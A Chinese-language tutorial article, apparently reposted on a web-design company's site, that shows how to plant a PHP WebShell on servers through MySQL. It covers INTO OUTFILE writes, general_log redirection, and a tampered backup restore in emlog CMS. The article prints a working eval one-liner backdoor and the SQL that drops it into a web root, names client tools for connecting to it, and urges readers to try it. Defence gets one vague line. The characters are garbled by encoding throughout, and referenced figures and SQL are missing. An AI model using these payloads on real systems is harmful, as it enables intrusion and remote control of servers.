數(shù)據(jù)庫(kù)上傳WebShell的方式有哪些

這篇文章主要介紹“數(shù)據(jù)庫(kù)上傳WebShell的方式有哪些”，在日常操作中，相信很多人在數(shù)據(jù)庫(kù)上傳WebShell的方式有哪些問(wèn)題上存在疑惑，小編查閱了各式資料，整理出簡(jiǎn)單好用的操作方法，希望對(duì)大家解答”數(shù)據(jù)庫(kù)上傳WebShell的方式有哪些”的疑惑有所幫助！接下來(lái)，請(qǐng)跟著小編一起來(lái)學(xué)習(xí)吧！

創(chuàng)新互聯(lián)建站專業(yè)為企業(yè)提供古藺網(wǎng)站建設(shè)、古藺做網(wǎng)站、古藺網(wǎng)站設(shè)計(jì)、古藺網(wǎng)站制作等企業(yè)網(wǎng)站建設(shè)、網(wǎng)頁(yè)設(shè)計(jì)與制作、古藺企業(yè)網(wǎng)站模板建站服務(wù)，十載古藺做網(wǎng)站經(jīng)驗(yàn)，不只是建網(wǎng)站，更提供有價(jià)值的思路和整體網(wǎng)絡(luò)服務(wù)。

一、什么是WebShell？

簡(jiǎn)單的說(shuō)來(lái)，webshell就是一個(gè)asp或php木馬后門(mén)，黑客在入侵了一個(gè)網(wǎng)站后，常常在將這些asp或php木馬后門(mén)文件放置在網(wǎng)站服務(wù)器的web目錄中，與正常的網(wǎng)頁(yè)文件混在一起。然后黑客就可以用web的方式，通過(guò)asp或php木馬后門(mén)控制網(wǎng)站服務(wù)器，包括上傳下載文件、查看數(shù)據(jù)庫(kù)、執(zhí)行任意程序命令等。

為了更好理解WebShell我們學(xué)習(xí)兩個(gè)概念：

什么是“木馬”？

“木馬”全稱是“特洛伊木馬(Trojan Horse)”，原指古希臘士兵藏在木馬內(nèi)進(jìn)入敵方城市從而占領(lǐng)敵方城市的故事。

在Internet上，“特洛伊木馬”指一些程序設(shè)計(jì)人員在其可從網(wǎng)絡(luò)上下載 (Download)的應(yīng)用程序或游戲中，包含了可以控制用戶的計(jì)算機(jī)系統(tǒng)的程序，可能造成用戶的系統(tǒng)被破壞甚至癱瘓。

什么是后門(mén)？

大家都知道，一臺(tái)計(jì)算機(jī)上有65535個(gè)端口，那么如果把計(jì)算機(jī)看作是一間屋子，那么這65535個(gè)端口就可以它看做是計(jì)算機(jī)為了與外界連接所開(kāi)的65535 扇門(mén)。每個(gè)門(mén)的背后都是一個(gè)服務(wù)。有的門(mén)是主人特地打開(kāi)迎接客人的（提供服務(wù)），有的門(mén)是主人為了出去訪問(wèn)客人而開(kāi)設(shè)的（訪問(wèn)遠(yuǎn)程服務(wù)）——理論上，剩下的其他門(mén)都該是關(guān)閉著的，但偏偏由于各種原因，很多門(mén)都是開(kāi)啟的。于是就有好事者進(jìn)入，主人的隱私被刺探，生活被打擾，甚至屋里的東西也被搞得一片狼跡。這扇悄然被開(kāi)啟的門(mén)——就是“后門(mén)”。

webshell的優(yōu)點(diǎn)

webshell 最大的優(yōu)點(diǎn)就是可以穿越防火墻，由于與被控制的服務(wù)器或遠(yuǎn)程主機(jī)交換的數(shù)據(jù)都是通過(guò)80端口傳遞的，因此不會(huì)被防火墻攔截。并且使用webshell一般不會(huì)在系統(tǒng)日志中留下記錄，只會(huì)在網(wǎng)站的web日志中留下一些數(shù)據(jù)提交記錄，沒(méi)有經(jīng)驗(yàn)的管理員是很難看出入侵痕跡的。

二、WebShell的分類

根據(jù)文件大小分類：大馬和小馬(通常指的是一句話木馬，能夠使用菜刀這類工具去直接連接它) 

根據(jù)腳本名稱分類：jsp、asp、aspx、php

小馬的功能比較單一，大馬的功能比較豐富，集成上傳下載、數(shù)據(jù)庫(kù)提權(quán)、CMD命令操作、克隆、代理等功能，如下圖所示。

三、利用數(shù)據(jù)庫(kù)上傳WebShell的三種方式

（1）into out file寫(xiě)入

數(shù)據(jù)庫(kù)中secure_file_priv支持web目錄文件導(dǎo)出、數(shù)據(jù)庫(kù)用戶File權(quán)限、獲取物理路徑；該參數(shù)有三種狀態(tài)：

secure_file_priv=NULL;

表示寫(xiě)入開(kāi)關(guān)關(guān)閉；

secure_file_priv="";

表示寫(xiě)入開(kāi)關(guān)打開(kāi)，且可以寫(xiě)入任意目錄；

secure_file_priv="C:/phpStudy/PHPTutorial/WWW";

表示寫(xiě)入開(kāi)關(guān)打開(kāi)，且寫(xiě)入到指定的路徑下，如果寫(xiě)入路徑不是Web路徑，也無(wú)法使用該功能寫(xiě)入WehShell。

該開(kāi)關(guān)無(wú)法通過(guò)SQL命令

set global secure_file_priv="C:/phpStudy/PHPTutorial/WWW"

參數(shù)打開(kāi)開(kāi)關(guān)，僅能通過(guò)修改MySQL.ini配置文件修改，局限性比較大。

如果開(kāi)關(guān)已經(jīng)打開(kāi)，正確寫(xiě)入WebShell的SQL語(yǔ)句如下：

select "<?php @eval($_POST['cmd']);?>" into outfile "C://phpStudy//PHPTutorial//WWW//shell.php"

然后利用此菜刀、蟻劍或者冰蝎鏈接即可

（2）通過(guò)general_log日志寫(xiě)入

可以通過(guò)修改日志開(kāi)關(guān)即可上傳webshell，該方式需要數(shù)據(jù)庫(kù)root權(quán)限即可，通過(guò)SQL語(yǔ)句即可打開(kāi)general_log開(kāi)關(guān)并設(shè)置日志位置（需要提前知道Web的根路徑位置）；

修改完畢后，通過(guò)

select "<?php @eval($_POST['cmd']);?>"

即可寫(xiě)入WebShell，寫(xiě)入后的php文件內(nèi)容如下圖所示

（3）通過(guò)備份數(shù)據(jù)庫(kù)漏洞寫(xiě)入

數(shù)據(jù)庫(kù)備份為大多數(shù)CMS后臺(tái)管理頁(yè)面必備的功能，但是如果后臺(tái)校驗(yàn)不嚴(yán)格，容易通過(guò)恢復(fù)備份方式上傳WebShell，以下以emlog的CMS講，測(cè)試版本5.3.0

 3.1查看web路徑地址

直接在管理頁(yè)面，點(diǎn)擊更多信息

在出來(lái)的phpinfo頁(yè)面搜索document_root即可

3.2 先備份數(shù)據(jù)庫(kù)

利用管理頁(yè)面的數(shù)據(jù)庫(kù)備份功能先備份數(shù)據(jù)庫(kù)

3.3修改備份文件內(nèi)容

打開(kāi)備份的SQL文件，在最后語(yǔ)句之前添加以下SQL語(yǔ)句

通過(guò)into outfile寫(xiě)入webshell；最后通過(guò)菜刀鏈接即可。

四、如何防御WebShell？

數(shù)據(jù)庫(kù)應(yīng)用應(yīng)做好安全加固，不該開(kāi)的開(kāi)關(guān)盡量不要打開(kāi)；同時(shí)做好數(shù)據(jù)庫(kù)備份和回復(fù)的后臺(tái)校驗(yàn)工作，平時(shí)做好日常安全防護(hù)。

到此，關(guān)于“數(shù)據(jù)庫(kù)上傳WebShell的方式有哪些”的學(xué)習(xí)就結(jié)束了，希望能夠解決大家的疑惑。理論與實(shí)踐的搭配能更好的幫助大家學(xué)習(xí)，快去試試吧！若想繼續(xù)學(xué)習(xí)更多相關(guān)知識(shí)，請(qǐng)繼續(xù)關(guān)注創(chuàng)新互聯(lián)網(wǎng)站，小編會(huì)繼續(xù)努力為大家?guī)?lái)更多實(shí)用的文章！

文章題目：數(shù)據(jù)庫(kù)上傳WebShell的方式有哪些
路徑分享：http://www.jbt999.com/article2/psioic.html

成都網(wǎng)站建設(shè)公司_創(chuàng)新互聯(lián)，為您提供動(dòng)態(tài)網(wǎng)站、全網(wǎng)營(yíng)銷推廣、移動(dòng)網(wǎng)站建設(shè)、網(wǎng)站排名、網(wǎng)站設(shè)計(jì)公司、網(wǎng)站內(nèi)鏈

廣告

聲明：本網(wǎng)站發(fā)布的內(nèi)容（圖片、視頻和文字）以用戶投稿、用戶轉(zhuǎn)載內(nèi)容為主，如果涉及侵權(quán)請(qǐng)盡快告知，我們將會(huì)在第一時(shí)間刪除。文章觀點(diǎn)不代表本網(wǎng)站立場(chǎng)，如需處理請(qǐng)聯(lián)系客服。電話：028-86922220；郵箱：[email protected]。內(nèi)容未經(jīng)允許不得轉(zhuǎn)載，或轉(zhuǎn)載時(shí)需注明來(lái)源： 創(chuàng)新互聯(lián)